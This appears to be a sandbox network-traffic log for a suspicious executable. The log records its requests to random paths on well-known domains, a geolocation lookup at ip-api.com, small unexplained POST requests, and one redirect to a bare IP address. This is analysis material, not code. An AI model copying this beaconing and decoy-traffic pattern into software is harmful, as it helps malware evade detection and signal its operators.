104.16.29.98
GET

https://www.eset.com/0O9WHnWMZM?q=0

B9a5797cb584014f3fede.exe

Remote address:

23.72.252.169:443

Request

GET /0O9WHnWMZM?q=0 HTTP/1.1
Host: www.eset.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Content-Type: text/html
Content-Length: 162
Location: https://www.eset.com/0O9WHnWMZM/?q=0
Referrer-Policy: no-referrer-when-downgrade
Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
X-Content-Type-Options: nosniff
Access-Control-Allow-Origin: https://www.eset.com
Content-Security-Policy: default-src 'self'; connect-src 'self' http://ad.doubleclick.net https://*.analytics.google.com https://*.clarity.ms https://*.demdex.net https://*.eset.com https://*.googlesyndication.com https://*.hotjar.com https://*.hotjar.io https://*.tt.omtrdc.net https://adservice.google.com https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.go-mpulse.net https://cdn.acsbapp.com https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cookies-data.onetrust.io https://ep.smct.co https://eset.tt.omtrdc.net https://geolocation.onetrust.com https://googleads.g.doubleclick.net https://ipb.smct.co https://ipb.smct.io https://js.smct.co https://js.smct.io https://maps.googleapis.com https://privacyportal.onetrust.com https://region1.google-analytics.com https://replay.uxtweak.com https://s.yimg.com https://script.crazyegg.com https://smct.co https://stats.g.doubleclick.net https://tracker.clickguard.com https://www.facebook.com https://www.g2.com https://www.google-analytics.com https://www.google.by https://www.google.ch https://www.google.co.uk https://www.google.co.uz https://www.google.com https://www.google.com.tj https://www.google.com.tr https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lt https://www.google.lv https://www.google.pl https://www.google.ru https://www.googletagmanager.com wss://*.hotjar.com; font-src 'self' data: https://cdn.userway.org https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com; frame-src 'self' https://*.fls.doubleclick.net https://8117415.fls.doubleclick.net https://bid.g.doubleclick.net https://download.eset.com https://eset.demdex.net https://hemsync.clickagy.com https://int.form.eset.com https://js.smct.io https://ls.smct.co https://protectdemo.eset.com https://smct.co https://tpc.googlesyndication.com https://unity.survey-solutions.cloud https://vars.hotjar.com https://widget.trustpilot.com https://www.facebook.com https://www.google.com https://www.googletagmanager.com https://www.youtube-nocookie.com https://www.youtube.com; img-src 'self' data: http://ad.doubleclick.net https://*.adform.net https://*.ads.linkedin.com https://*.yahoo.co.jp https://ad.doubleclick.net https://ade.googlesyndication.com https://adservice.google.at https://adservice.google.ch https://adservice.google.co.jp https://adservice.google.com https://adservice.google.de https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.bing.com https://c.clarity.ms https://captcha.eset.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.smct.co https://cdn.smct.io https://cdn1.esetstatic.com https://cm.everesttech.net https://cm.g.doubleclick.net https://connect.facebook.net https://dc.ads.linkedin.com https://dpm.demdex.net https://events.smct.co https://googleads.g.doubleclick.net https://images.g2crowd.com https://maps.googleapis.com https://pagead2.googlesyndication.com https://pubads.g.doubleclick.net https://px.ads.linkedin.com https://region1.analytics.google.com https://region1.google-analytics.com https://script.hotjar.com https://sgtm.eset.com https://ssitecat.eset.com https://ssl.google-analytics.com https://static.hotjar.com https://stats.g.doubleclick.net https://t.co https://tribl.io https://www.facebook.com https://www.google-analytics.com https://www.google.ad https://www.google.ae https://www.google.al https://www.google.am https://www.google.at https://www.google.az https://www.google.ba https://www.google.be https://www.google.bf https://www.google.bg https://www.google.bi https://www.google.bj https://www.google.bs https://www.google.bt https://www.google.by https://www.google.ca https://www.google.cd https://www.google.cf https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.cn https://www.google.co.ao https://www.google.co.bw https://www.google.co.cr https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.kr https://www.google.co.ls https://www.google.co.ma https://www.google.co.mz https://www.google.co.nz https://www.google.co.th https://www.google.co.tz https://www.google.co.ug https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.vi https://www.google.co.za https://www.google.co.zm https://www.google.co.zw https://www.google.com https://www.google.com.af https://www.google.com.ag https://www.google.com.ar https://www.google.com.au https://www.google.com.bd https://www.google.com.bh https://www.google.com.bn https://www.google.com.bo https://www.google.com.br https://www.google.com.bz https://www.google.com.co https://www.google.com.cu https://www.google.com.cy https://www.google.com.do https://www.google.com.ec https://www.google.com.eg https://www.google.com.et https://www.google.com.fj https://www.google.com.gh https://www.google.com.gi https://www.google.com.gt https://www.google.com.hk https://www.google.com.jm https://www.google.com.kh https://www.google.com.kw https://www.google.com.lb https://www.google.com.ly https://www.google.com.mm https://www.google.com.mt https://www.google.com.mx https://www.google.com.my https://www.google.com.na https://www.google.com.ng https://www.google.com.ni https://www.google.com.np https://www.google.com.om https://www.google.com.pa https://www.google.com.pe https://www.google.com.pg https://www.google.com.ph https://www.google.com.pk https://www.google.com.pr https://www.google.com.py https://www.google.com.qa https://www.google.com.sa https://www.google.com.sb https://www.google.com.sg https://www.google.com.sl https://www.google.com.sv https://www.google.com.tj https://www.google.com.tr https://www.google.com.tw https://www.google.com.ua https://www.google.com.uy https://www.google.com.vc https://www.google.com.vn https://www.google.cv https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dk https://www.google.dm https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ga https://www.google.ge https://www.google.gg https://www.google.gl https://www.google.gm https://www.google.gr https://www.google.gy https://www.google.hn https://www.google.hr https://www.google.ht https://www.google.hu https://www.google.ie https://www.google.im https://www.google.iq https://www.google.is https://www.google.it https://www.google.je https://www.google.jo https://www.google.kg https://www.google.ki https://www.google.kz https://www.google.la https://www.google.li https://www.google.lk https://www.google.lt https://www.google.lu https://www.google.lv https://www.google.md https://www.google.me https://www.google.mg https://www.google.mk https://www.google.ml https://www.google.mn https://www.google.mu https://www.google.mv https://www.google.mw https://www.google.ne https://www.google.nl https://www.google.no https://www.google.nr https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.rs https://www.google.ru https://www.google.rw https://www.google.sc https://www.google.se https://www.google.si https://www.google.sk https://www.google.sm https://www.google.sn https://www.google.so https://www.google.sr https://www.google.td https://www.google.tg https://www.google.tl https://www.google.tm https://www.google.tn https://www.google.tt https://www.google.vg https://www.google.vu https://www.googletagmanager.com https://www.hotjar.com https://www.linkedin.com; manifest-src 'none'; media-src 'self'; object-src 'self'; prefetch-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
X-EDPS-Request-Status: normal
Strict-Transport-Security: max-age=15724800
Cache-Control: public, max-age=3600
Date: Sat, 14 Oct 2023 18:20:59 GMT
Connection: keep-alive
Set-Cookie: TS01a40e5a=016c9a7a13324ca8455d134f4b76c2f82ee3e978b2b1559734a7fe4e2248de09ee26d5f82635873930c51671b2c9f31dd2cb1ebafa; Path=/; Domain=.eset.com
GET

https://www.eset.com/0O9WHnWMZM/?q=0

B9a5797cb584014f3fede.exe

Remote address:

23.72.252.169:443

Request

GET /0O9WHnWMZM/?q=0 HTTP/1.1
Host: www.eset.com

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer-when-downgrade
Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
X-Content-Type-Options: nosniff
Access-Control-Allow-Origin: https://www.eset.com
Content-Security-Policy: default-src 'self'; connect-src 'self' http://ad.doubleclick.net https://*.analytics.google.com https://*.clarity.ms https://*.demdex.net https://*.eset.com https://*.googlesyndication.com https://*.hotjar.com https://*.hotjar.io https://*.tt.omtrdc.net https://adservice.google.com https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.go-mpulse.net https://cdn.acsbapp.com https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cookies-data.onetrust.io https://ep.smct.co https://eset.tt.omtrdc.net https://geolocation.onetrust.com https://googleads.g.doubleclick.net https://ipb.smct.co https://ipb.smct.io https://js.smct.co https://js.smct.io https://maps.googleapis.com https://privacyportal.onetrust.com https://region1.google-analytics.com https://replay.uxtweak.com https://s.yimg.com https://script.crazyegg.com https://smct.co https://stats.g.doubleclick.net https://tracker.clickguard.com https://www.facebook.com https://www.g2.com https://www.google-analytics.com https://www.google.by https://www.google.ch https://www.google.co.uk https://www.google.co.uz https://www.google.com https://www.google.com.tj https://www.google.com.tr https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lt https://www.google.lv https://www.google.pl https://www.google.ru https://www.googletagmanager.com wss://*.hotjar.com; font-src 'self' data: https://cdn.userway.org https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com; frame-src 'self' https://*.fls.doubleclick.net https://8117415.fls.doubleclick.net https://bid.g.doubleclick.net https://download.eset.com https://eset.demdex.net https://hemsync.clickagy.com https://int.form.eset.com https://js.smct.io https://ls.smct.co https://protectdemo.eset.com https://smct.co https://tpc.googlesyndication.com https://unity.survey-solutions.cloud https://vars.hotjar.com https://widget.trustpilot.com https://www.facebook.com https://www.google.com https://www.googletagmanager.com https://www.youtube-nocookie.com https://www.youtube.com; img-src 'self' data: http://ad.doubleclick.net https://*.adform.net https://*.ads.linkedin.com https://*.yahoo.co.jp https://ad.doubleclick.net https://ade.googlesyndication.com https://adservice.google.at https://adservice.google.ch https://adservice.google.co.jp https://adservice.google.com https://adservice.google.de https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.bing.com https://c.clarity.ms https://captcha.eset.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.smct.co https://cdn.smct.io https://cdn1.esetstatic.com https://cm.everesttech.net https://cm.g.doubleclick.net https://connect.facebook.net https://dc.ads.linkedin.com https://dpm.demdex.net https://events.smct.co https://googleads.g.doubleclick.net https://images.g2crowd.com https://maps.googleapis.com https://pagead2.googlesyndication.com https://pubads.g.doubleclick.net https://px.ads.linkedin.com https://region1.analytics.google.com https://region1.google-analytics.com https://script.hotjar.com https://sgtm.eset.com https://ssitecat.eset.com https://ssl.google-analytics.com https://static.hotjar.com https://stats.g.doubleclick.net https://t.co https://tribl.io https://www.facebook.com https://www.google-analytics.com https://www.google.ad https://www.google.ae https://www.google.al https://www.google.am https://www.google.at https://www.google.az https://www.google.ba https://www.google.be https://www.google.bf https://www.google.bg https://www.google.bi https://www.google.bj https://www.google.bs https://www.google.bt https://www.google.by https://www.google.ca https://www.google.cd https://www.google.cf https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.cn https://www.google.co.ao https://www.google.co.bw https://www.google.co.cr https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.kr https://www.google.co.ls https://www.google.co.ma https://www.google.co.mz https://www.google.co.nz https://www.google.co.th https://www.google.co.tz https://www.google.co.ug https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.vi https://www.google.co.za https://www.google.co.zm https://www.google.co.zw https://www.google.com https://www.google.com.af https://www.google.com.ag https://www.google.com.ar https://www.google.com.au https://www.google.com.bd https://www.google.com.bh https://www.google.com.bn https://www.google.com.bo https://www.google.com.br https://www.google.com.bz https://www.google.com.co https://www.google.com.cu https://www.google.com.cy https://www.google.com.do https://www.google.com.ec https://www.google.com.eg https://www.google.com.et https://www.google.com.fj https://www.google.com.gh https://www.google.com.gi https://www.google.com.gt https://www.google.com.hk https://www.google.com.jm https://www.google.com.kh https://www.google.com.kw https://www.google.com.lb https://www.google.com.ly https://www.google.com.mm https://www.google.com.mt https://www.google.com.mx https://www.google.com.my https://www.google.com.na https://www.google.com.ng https://www.google.com.ni https://www.google.com.np https://www.google.com.om https://www.google.com.pa https://www.google.com.pe https://www.google.com.pg https://www.google.com.ph https://www.google.com.pk https://www.google.com.pr https://www.google.com.py https://www.google.com.qa https://www.google.com.sa https://www.google.com.sb https://www.google.com.sg https://www.google.com.sl https://www.google.com.sv https://www.google.com.tj https://www.google.com.tr https://www.google.com.tw https://www.google.com.ua https://www.google.com.uy https://www.google.com.vc https://www.google.com.vn https://www.google.cv https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dk https://www.google.dm https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ga https://www.google.ge https://www.google.gg https://www.google.gl https://www.google.gm https://www.google.gr https://www.google.gy https://www.google.hn https://www.google.hr https://www.google.ht https://www.google.hu https://www.google.ie https://www.google.im https://www.google.iq https://www.google.is https://www.google.it https://www.google.je https://www.google.jo https://www.google.kg https://www.google.ki https://www.google.kz https://www.google.la https://www.google.li https://www.google.lk https://www.google.lt https://www.google.lu https://www.google.lv https://www.google.md https://www.google.me https://www.google.mg https://www.google.mk https://www.google.ml https://www.google.mn https://www.google.mu https://www.google.mv https://www.google.mw https://www.google.ne https://www.google.nl https://www.google.no https://www.google.nr https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.rs https://www.google.ru https://www.google.rw https://www.google.sc https://www.google.se https://www.google.si https://www.google.sk https://www.google.sm https://www.google.sn https://www.google.so https://www.google.sr https://www.google.td https://www.google.tg https://www.google.tl https://www.google.tm https://www.google.tn https://www.google.tt https://www.google.vg https://www.google.vu https://www.googletagmanager.com https://www.hotjar.com https://www.linkedin.com; manifest-src 'none'; media-src 'self'; object-src 'self'; prefetch-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
X-EDPS-Request-Status: normal
Strict-Transport-Security: max-age=15724800
Cache-Control: max-age=3562
Date: Sat, 14 Oct 2023 18:21:01 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: TS01a40e5a=016c9a7a13b5642e554b34559a78797db0555ba8fee301005fdb5a4f2d39622dfe7f11d846e9c631f6308bc0f4bc73b62fc1432eda; Path=/; Domain=.eset.com
DNS

www.pornhub.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

www.pornhub.com

IN A

Response

www.pornhub.com

IN CNAME

pornhub.com

pornhub.com

IN A

66.254.114.41
GET

https://www.pornhub.com/YvXAWrkHSP?q=0

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:443

Request

GET /YvXAWrkHSP?q=0 HTTP/1.1
Host: www.pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

server: openresty
date: Sat, 14 Oct 2023 18:20:59 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
ph-redirect: 1020
location: http://154.61.71.51
x-frame-options: SAMEORIGIN
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
set-cookie: __s=652ADC0B-42FE722901BB9F2DB-A7EF0A3; Secure; Samesite=None
set-cookie: __l=652ADC0B-42FE722901BB9F2DB-A7EF0A3; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/nZJ8XB6TLb?q=129

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:443

Request

GET /nZJ8XB6TLb?q=129 HTTP/1.1
Host: www.pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

server: openresty
date: Sat, 14 Oct 2023 18:20:59 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
ph-redirect: 1020
location: http://154.61.71.51
x-frame-options: SAMEORIGIN
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
set-cookie: __s=652ADC0B-42FE722901BB54E8A-A7BDA17; Secure; Samesite=None
set-cookie: __l=652ADC0B-42FE722901BB54E8A-A7BDA17; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
DNS

apps.identrust.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

apps.identrust.com

IN A

Response

apps.identrust.com

IN CNAME

identrust.edgesuite.net

identrust.edgesuite.net

IN CNAME

a1952.dscq.akamai.net

a1952.dscq.akamai.net

IN A

88.221.25.169

a1952.dscq.akamai.net

IN A

88.221.25.153
GET

http://apps.identrust.com/roots/dstrootcax3.p7c

B9a5797cb584014f3fede.exe

Remote address:

88.221.25.169:80

Request

GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

Response

HTTP/1.1 200 OK

X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:20:59 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Connection: keep-alive
GET

http://openai.com/ftOpuXgkwC?q=229

B9a5797cb584014f3fede.exe

Remote address:

13.107.213.67:80

Request

GET /ftOpuXgkwC?q=229 HTTP/1.1
Host: openai.com
Connection: Keep-Alive

Response

HTTP/1.1 307 Temporary Redirect

Location: https://openai.com/ftOpuXgkwC?q=229
X-Azure-Ref: 0EdwqZQAAAACal88a+BsaT5FNBcZmeLWKQlJVMzBFREdFMDcxMAA3ZjE3YzA2NC00MTQ5LTQ2ODctOTk4Yy00ZDliMjE2YjI1OGY=
Date: Sat, 14 Oct 2023 18:21:05 GMT
Content-Length: 0
POST

http://openai.com/ScdEUc6SlP?q=1

B9a5797cb584014f3fede.exe

Remote address:

13.107.213.67:80

Request

POST /ScdEUc6SlP?q=1 HTTP/1.1
Host: openai.com
Content-Length: 121
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 307 Temporary Redirect

Date: Sat, 14 Oct 2023 18:21:05 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: https://openai.com/ScdEUc6SlP?q=1
x-azure-ref: 20231014T182105Z-3hfv7z0vc92e7558p4mdtfw7rg00000004u000000000x5yf
X-Cache: CONFIG_NOCACHE
GET

http://ip-api.com/line?fields=query,country

B9a5797cb584014f3fede.exe

Remote address:

208.95.112.1:80

Request

GET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 14 Oct 2023 18:21:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Access-Control-Allow-Origin: *
X-Ttl: 53
X-Rl: 43
GET

http://pornhub.com/nZJ8XB6TLb?q=129

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:80

Request

GET /nZJ8XB6TLb?q=129 HTTP/1.1
Host: pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

content-length: 0
location: https://pornhub.com/nZJ8XB6TLb?q=129
POST

http://pornhub.com/NXksi90VVl?q=1

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:80

Request

POST /NXksi90VVl?q=1 HTTP/1.1
Host: pornhub.com
Content-Length: 143
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

content-length: 0
location: https://pornhub.com/NXksi90VVl?q=1
connection: close
GET

http://pornhub.com/nZJ8XB6TLb?q=129

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:80

Request

GET /nZJ8XB6TLb?q=129 HTTP/1.1
Host: pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

content-length: 0
location: https://pornhub.com/nZJ8XB6TLb?q=129
GET

http://google.com/7jG017oTlL?q=93

B9a5797cb584014f3fede.exe

Remote address:

142.250.179.142:80

Request

GET /7jG017oTlL?q=93 HTTP/1.1
Host: google.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Sat, 14 Oct 2023 18:21:05 GMT
GET

http://google.com/In4oCqfhFE?q=131

B9a5797cb584014f3fede.exe

Remote address:

142.250.179.142:80

Request

GET /In4oCqfhFE?q=131 HTTP/1.1
Host: google.com

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Sat, 14 Oct 2023 18:21:07 GMT
POST

http://youtube.com/Ep3hnbR6IC?q=0

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /Ep3hnbR6IC?q=0 HTTP/1.1
Host: youtube.com
Content-Length: 162
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:05 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/Ep3hnbR6IC?q=0

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /Ep3hnbR6IC?q=0 HTTP/1.1
Host: youtube.com
Content-Length: 162
Expect: 100-continue

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:06 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:06 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:06 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:06 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
